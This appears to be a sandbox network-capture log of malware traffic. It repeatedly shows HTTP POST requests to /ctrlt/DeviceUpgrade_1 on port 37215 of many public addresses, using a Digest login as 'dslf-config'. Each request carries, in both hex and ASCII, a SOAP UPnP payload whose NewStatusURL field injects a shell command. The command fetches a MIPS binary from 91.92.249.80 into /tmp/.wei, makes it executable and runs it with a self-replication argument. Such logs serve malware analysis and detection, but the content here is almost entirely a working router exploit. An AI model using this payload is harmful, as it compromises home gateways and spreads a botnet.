                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1969192.168.2.2345092197.37.163.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590912104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1970192.168.2.2360244157.128.200.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590915918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1971192.168.2.233316891.48.99.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590928078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1972192.168.2.233558482.175.54.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590934992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1973192.168.2.233536841.40.147.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590956926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1974192.168.2.235836041.112.149.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590966940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1975192.168.2.2360506213.68.107.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591053009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1976192.168.2.2359230197.119.2.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591165066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1977192.168.2.2352372157.187.165.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591202021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1978192.168.2.2355054157.184.245.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591219902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1979192.168.2.2347176157.116.141.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.591275930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
